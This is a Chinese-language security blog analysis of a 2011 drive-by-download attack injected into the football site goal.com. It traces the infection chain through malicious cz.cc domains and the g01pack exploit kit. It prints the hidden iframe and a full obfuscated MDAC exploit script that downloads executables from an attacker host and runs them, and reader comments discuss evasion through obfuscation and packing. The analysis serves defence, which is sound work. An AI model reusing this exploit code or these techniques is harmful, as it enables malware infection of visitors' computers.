阿碼外傳-阿碼科技非官方中文 Blog: 知名足球網站(goal.com)散播惡意程式

2011年5月10日

知名足球網站(goal.com)散播惡意程式

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)

1. 根據compete.com,goal.com每一天平均有232,116個人瀏覽
2. 根據checksitetraffic.com,每一天則有215,989人
3. goal.com在Alexaalexa.com全球的排名是Rank. 379

HackAlert最近在4/27~4/28中偵測到有Drive-By-Download的行為。根據我們所觀察到的,我們相信攻擊者具有能夠進入goal.com系統內部的權限,同時僅在4/27~4/28中測試攻擊的效果。
以下是我們的技術報告:

[摘要]

A. 根據我們所搜集到的資料,有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式,用以控制該網站。

B. 我們認為這次的攻擊不屬於一次性的mass-SQL injection攻擊,因為相關惡意網域並未出現在其他被感染的網站中。

C. 惡意網域包含:
1. pxcz.cz.cc (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
2. opofy7puti.cz.cc (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
3. justatest.cz.cc (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)

這些線索顯示這是一個針對goal.com所發動的攻擊。

D. 持續散播時間為4/27~4/28,攻擊者似乎是使用這段時間來測試攻擊的效果,而在這段時間被我們的Scanner掃到。

E. 被我們採樣到的攻擊碼會針對以下的弱點進行攻擊:CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC)

F. 使用的是g01pack exploit pack,與一般的exploit pack不同的是他包含了一個假的admin管理頁面,攻擊者可透過這個假的"honeynet"來觀察是誰在做進一步的調查。

G. 攻擊碼本身做了相當程度的"變形",在這邊我們不用"混碼"這個字詞的原因是:除了混碼之外,攻擊碼本身就使用了有別於以往的方式來規避偵測。

H. 惡意程式本身透過UPX來進行加殼,會修改系統中的setupapi.dll及sfcfiles.dat。當我們第一次傳送到VirusTotal時,僅有四家防毒廠商(4 / 41)標示其為惡意。

I. 惡意程式會連到以下網域:

1. testurl.ipq.co:80 (UK) (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
2. 74.125.47.99:80 (US),反解得到coldgold.co.uk (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單)
3. banderlog.org (沒有被任何一家防毒廠商/Google SafeBrowsing 標示為黑名單,但是在clean-mx.de可以看到他的蹤跡)

[詳細資訊]

這裡可以下載我們側錄的感染記錄檔。包含了在用瀏覽器瀏覽時所產生的Http Traffic,從開始瀏覽網站到惡意程式本身透過瀏覽器被下載下來。

整個感染鏈為:
1. goal.com,包含iframe指向pxcz.cz.cc
2. pxcz.cz.cc 內包含iframe指向justatest.cz.cc
3. justatest.cz.cc內包含攻擊程式碼(g01pack exploit pack),會依照使用者的瀏覽器不同提供不同的攻擊碼
4. 攻擊碼成功執行,從justatest.cz.cc下載惡意程式
5. 惡意程式連結到testurl.ipq.co (UK),74.125.47.99:80 (US, coldgold.co.uk),及banderlog.org
整個感染鏈從http://www.goal.com/en/開始:
<p>Arjen Robben has admitted that his future lies with the German and European giants, hinting that he could even remain there for the rest of his career <style type="text/css">#yxvim {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style><iframe id="yxvim" src="http://pxcz.cz.cc/ad.jpg"></iframe></p>

攻擊者在上述HTML語法的後面加上了一個iframe指向pxcz.cz.cc。pxcz.cz.cc包含了另一個iframe指向justatest.cz.cc,justatest.cz.cc則同時包含了攻擊碼(g01pack)及惡意程式本身。這個g01pack比較特殊的部份是他同時包含了一些假的Admin頁面,這個Admin頁面支援一些常見的帳號密碼(比如Admin / Admin),用來讓分析人員相信他們成功的穫取了g01pack管理頁面的權限。

一旦成功登入之後,呈現在分析者眼前的是攻擊者造假的數據,在此同時,攻擊者則可透過這個行為,了解有哪些人正在嘗試分析這個惡意網域。

這次事件中的攻擊碼經過相當程度的"變形",有別於以往的混碼技術,讓分析人員無法一眼即看出其為攻擊碼。TExploit pack本身包含了許多組攻擊碼,在此我們僅秀出利用CVE-2006-0003 (MS MDAC)漏洞的攻擊碼。此段攻擊碼可以在這裡取得。
<html>en clonus purins knot ghat inlier sine bipeds obese tart.<body>heroins pallors glugs. Opera. Pyx ducted boss shea abele knot hajes eh moot nisi tickled howl pangens bobs blind stir reinked ajee.atria obese saddle. Nisi uh bracts pyx.bipeds abaft arctic brave arabic purins blind polo. Pyx pallors. Sludge atria noisy bug slojd stow dumps. Kappa sri tawse bracts hank.fresco delta. Caldron arctic bucko sine byre inlier haeres.<script>var test;function redirect(){location.href="?topic_id=6.0&forum_id=qtest&action=MSIE&nid=name&year=c&start=2&thread_id=53585053&rid=708";}setTimeout(redirect, 20000);var move=new String("openul0".substr(0,4));var out=["ctfmon",String("javaWI8X".substr(0,4)),new String("acro"+"bat"),new String("explore"+"rC52".substr(0,1)),String("useri"+"nit"),"chromeHkpS".substr(0,6),"svch"+"ostc"];var follow="Sav"+"eTo"+"Fil"+"e";var air;var family=1;var low=6000;var never=";";var now=String("setTimeout");var sun=0;var age="";var turn=[];var have=["spellOver","play","cross"];this.few=29107;this.few-=150;var begin;var useDrive="clsid:BD9oqk".substr(0,9)+"6C556-65ANEm".substr(0,9)+"3-11D0-98rWqE".substr(0,9)+"3A-00C04F"+"ZuqC29E36uqZ".substr(3,6);var stay=new String("she"+"lle"+"xec"+"ute");var then=new String("replaceUyK".substr(0,7));var once=new String("typeUdm".substr(0,4));var ground=["youUnder","home","base"];var own=new String();var meLittle="setAttrT2hF".substr(0,7)+"ibute5MEY".substr(0,5);var will=new String("pus5ceI".substr(0,3)+"9BUhU9B".substr(3,1));var most=2;var best="send";var teachSeem="";var star="";try {} catch(mark){};var strong;var bed="Close";var end="Wri"+"te";var pass="http://opofy7puti.cz.cc:80/domains/f848af41f9d81c1603fb52a6b7844642.php?start=12&thread_id=53585053&forum_id=qtest&";var readAmong="CreateObjec"+"t";var redDog="responseBo"+"dyck4".substr(0,2);function oh(){sea=[];want=18559;want++;try {var book="ourPiece"} catch(book){};var they="";come=["northTurn","set","above"];change={};if(pass.indexOf(never) > -1){var groundMight=new Array();this.strongLess=978;this.strongLess++;call={word:10445};var writeHim=["comeWould"];var serve="";var stopYes="";hand=25269;hand-=192;school = pass.split(never);var good={his:20957};var turnBoy=false;this.travel="travel";add=16993;add--;var should="";for(var i in school){var govern="";this.airMark=false;place=27537;place-=204;try {var run="familyCommon"} catch(run){};var yetNeed=new String();var quick = school[i][then](/^\s+|\s+$/g, age); var music="";this.plant=459;this.plant-=142;var underHad="";fall={};yetFarm=6780;yetFarm-=19;var shape=29557;if(quick != age){var make=false;var their={high:"down"};plane={yes:"front"};turn[will](quick);wood={blue:8491};ohEat=17592;ohEat+=255;this.road="road";}}} else {var thereLarge=new String();var yesWheel=new String();var saw=["shortSleep","stayCommon","heard"];this.yourLeave="yourLeave";var table=23075;turn[will](pass);var turnYet="turnYet";var friendPound={newBody:"studyNotice"};} dryCity={callChange:16908};this.passPeople=8404;this.passPeople--;var drive=[];var able="";var willTake="willTake";return turn;}var foodThough=new String();try {} catch(veryStrong){};this.moveEarth=7491;this.moveEarth+=102;this.someOpen=26120;this.someOpen++;function than(again, point){life=["simple"];knowGround=24748;knowGround--;figureFigure=30877;figureFigure-=200;var does=new String();var sleepFace=["orWalk","inch","cold"];yourSlow=775;yourSlow+=122;what=[];a=21635;a+=166;test[meLittle](again, point);}northBeauty={watch:"fewLove"};var line={};var head=22943;var piece=32549;function the(){var pose=20499;var frontCross=4606;ago=7777;ago+=220;if(!free()) return;serveWell=25614;serveWell++;objectWorld=24863;objectWorld-=114;darkCommon=22684;darkCommon++;var willPerson=new Array();test=document.createElement(new String("object"));than(new String("classi"+"d"), useDrive);var moveEarly="moveEarly";this.moonHome="";bedPower={since:false};than("id", "test");try {strong = test[readAmong]("Shell.A9kDj".substr(0,7)+"DH0pplicat0HD".substr(3,7)+"MrbionMbr".substr(3,3),age);find=[];this.learn="";hold=[];air = test[readAmong]("adodb.strea"+"mnXk".substr(0,1),age);this.why=19607;this.why++;var rest=new Date();var him="";var turn = oh();this.differ="differ";var sawAmong=["moneyAt","moreA","boyMuch"];var stopSun=["letter","pound","young"];var sideHeat=["white","spellAbove"];var thoseFirst=["northFact","needCome"];doesRock=17386;doesRock--;if(turn.length <= 0) return false;which=["i","took","fish"];agoOld=["laughOften","seemOrder","figureGreen"];var runHalf={cut:27153};var schoolOut=["differGot","wonder","poseNotice"];for(var i=sun; i < turn.length; i++){var fromLong=new Date();var haveSlow=new String();var ifCover=["finalDone","againOnly"];var unitIt=[];pullTown={leadOut:"deepMade"};var decide=[];this.both=22541;this.both++;var unit = out[i % out.length];var enough = turn[i];goodDrive={water:"cry"};secondCenter=[];var endDiffer=false;var your = "./."+"./yzvw".substr(0,2) + unit + new String(".exe");this.dont=18287;this.dont--;try {var faceAppear="fewReal"} catch(faceAppear){};var voicePoint=low * i;var shortPlane=["heatRule"];var knew="";try {var shapeCause="ageHave"} catch(shapeCause){};dryLook=[];meanFar(new String(enough), new String(your));var right=23685;try {} catch(feel){};try {} catch(hisTree){};var had=new Date();}} catch(e){}}function longSaid(stoodTree){planeIt={};var shouldSide=8362;northAmong={faceMade:false};var windReal="windReal";cutOften=["riverPiece","orderWater","commonLay"];nowSay=["bodyAlso"];begin = test[readAmong]("msxml2.XMLO4eW".substr(0,10)+"HTTP", age);var planeTop=new Date();whichThem={shipSame:26359};var fatherIdea=24125;var there=16243;begin[move]("GET", stoodTree);asAmong=["seaFew"];whileRun=["warDrive"];this.feetSing=7842;this.feetSing--;begin[best]();var thatWhen="thatWhen";this.hisNever="hisNever";story=9303;story+=10;return begin[redDog];}function free(){var thereWrite={strongPaper:false};this.keepLot="";return (document.body.style.textOverflow != undefined);}function meanFar(stoodTree,color){var wentMother=["turnTalk","staySleep","she"];this.largeRed=28365;this.largeRed-=184;eat=["atMove"];var found={shouldPlay:"figureStep"};try {var standMother=3260;toward=26805;toward++;var actPress="";try {var work="lightCold"} catch(work){};try {var other=new Date();var rainTable=28788;air[bed]();this.coldMake="coldMake";fatherUs=["andFast","hour"];} catch(stand){}this.lastTheir=29388;this.lastTheir--;var downStrong={topWas:11226};try {var answerWater="servePaper"} catch(answerWater){};power=longSaid(stoodTree);peopleHad=["kingRiver"];this.house=4015;this.house++;air[once]=family;cameWho={hasEye:"bringForce"};foodEast=["feetThat","shortHave"];air[move]();happenUs=["fewMany","butWell"];var helpRound=27891;air[end](power);drawHome={number:721};surePage={late:false};air[follow](color,most);try {var cryFarm="putFollow"} catch(cryFarm){};var plantClear="";air[bed]();try {var meEver="shapeDark"} catch(meEver){};try{var whyRule=["slow","followNight"];var whiteAnswer=["standWatch","fastKnew"];var sameOff=26811;actCome=["walkHand","even","waterWay"];this.draw=29713;this.draw-=76;strong[stay](color);var clear="";var tellFront=["seemBody"];var lookNumber="";} catch(e){}mayForce=12153;mayForce+=212;var homeMay={unitFirst:false};manAt=8219;manAt+=30;whereSoon=["happenRiver","aboveCause"];cutLive=["wentThere","meanBusy"];}catch(noun) {lessFive=["fishTail","behindYet","ourAgo"];this.same=false;var airSix="";try {var direct=false;var better=["showGrow","factHand"];air[bed]();changeBack={hot:6344};var it=new Array();} catch(first){}helpPlain=["beBig","listen"];}var ageSecond=15826;this.fallThree="";var faceTree=28716;}var sleep=0;var topAnimal=false;function groundMen(){while(sleep++ < 171){groundMen();}if(!topAnimal){topAnimal = true;the();}}groundMen();</script>nisi nebs coalify opera caw add gluts rewon toph reinked bucko web moot.woofer reinked haeres arabic hernia bice blind nebs schmoos stow opera obese snaffle en hajes scow pyx.</body></html>

2 篇回應 :

匿名 提到...

感謝你的分享
小弟想請問筆者幾個問題
1.什麼是 exploit pack
2.upx加殼的目的是? 修改哪些header?
3.除了混碼之外,攻擊碼本身就使用了有別於以往的方式來規避偵測
請問筆者常見規避方法有哪些,可以舉簡單例子嗎

麻煩指導 謝謝

Cola 提到...

1.
exploit pack是一個工具組,裡面包含了好幾組exploit code(攻擊碼)
透過exploit pack的幫忙,攻擊者可以同時打好幾個漏洞(一組攻擊碼對應一個漏洞)

就像在本次事件中,我們觀察到g01pack有針對以下漏洞進行攻擊: CVE-2010-1423、CVE-2010-1885、CVE-2009-0927、CVE-2006-0003

2.
一般來說加殼的目的有以下幾點:
a. 讓pe檔(exe檔,即一般執行檔)的size變小
b. 反逆向工程,讓逆向工程較不容易進行
c. 躲避以特徵碼比對為主的防毒軟體偵測

3.
混碼方面,為了規避偵測,常見的方法是利用一些字串的控制(比如substr、replace),自己定義的function name(比如oiahc替換eval),甚至自己定義一些加密演算法等等

至於本篇文章中所提到的"變形",是因為我們在分析這個案例時,發現攻擊碼本身不像我們先前的,這次的攻擊碼主要的差異有以下幾點:
a. 在攻擊碼中安插一些無意義的字元,造成分析上的困難,比如mayForce=12153;mayForce+=212;,但是該變數根本未拿來使用
b. 一些function name也不像之前我們分析其他案例時,有幾個特徵可以判斷是攻擊哪一個漏洞(比如: MDAC、IEPEER),取而代之的是看起來沒有意義的名字
c. 沒有使用到一些常見的攻擊碼特徵,比如大量類似字串的重覆、URL encode、HEX encode等等
透過以上三個特性,會造成一些透過特徵比對的技術較難有效偵測

張貼留言